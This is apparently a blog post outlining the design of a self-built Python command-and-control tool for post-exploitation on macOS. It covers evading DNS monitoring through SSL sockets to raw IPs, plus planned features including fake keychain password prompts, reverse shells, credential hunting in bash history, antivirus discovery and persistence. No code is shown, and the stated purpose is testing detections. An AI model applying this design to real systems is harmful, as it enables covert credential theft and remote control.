Overview

So since I was really interested in learning the process of creating a post exploitation tool for macOS, I started with the concept of a client-server script relationship, where the client would be the “infected” macOS device and the server would be the host that I am controlling the client from. Below is a simplified overview of the approach I decided to go with:

High Level Command and Control Concept

I decided to go with python as the coding language since python2 is inherent on macOS devices and since I use python regularly. I set the client script to be python2 using only python standard library modules for easy use and execution across any macOS endpoint and I used python3 on the server, since the server is a host that I control and I could easily install whatever I needed on the server (though I ended up using only standard library modules in the server script as well).

For encryption, I decided to go with SSL encrypted socket connections for a couple reasons:

Limited time on my end and using encrypted sockets was pretty quick to set up. I thought using encrypted sockets would be a good way to validate detections/preventions. Most DNS monitoring and sink holing solutions rely on anomalies around domains (ex: domain age, lack of certain DNS records for the domain, domain blacklist match, etc.), and so using an encrypted socket to an IP address would be a way around these mechanisms. On the flip side, if an environment is monitoring suspicious connections to IP addresses (without domain name resolutions) using tools like Bro IDS, then this activity would be flagged. So I thought this would be a good test to see where detections/preventions landed with this approach.

This method I used is definitely not the only way to perform this task. This just happens to be the method I used. Several really neat toolkits are out that use other methods such as APIs for command and control.

Some of the things I wanted my server to command the client to perform:

execute OS shell commands

grab screenshots

download files

pop up a fake keychain prompt and ask the user to enter their password

navigate the file system

spawn an interactive shell and send to an IP:port

search bash history for interesting strings

search for endpoint antivirus and monitoring software

add and remove persistence

Good news for several of the “wish list” items above is that I could leverage the research done by other engineers in the industry. For example the I was able to leverage some of the osascript commands in the macphish tool by Paulino Calderon: https://github.com/cldrn/macphish/wiki/Osascript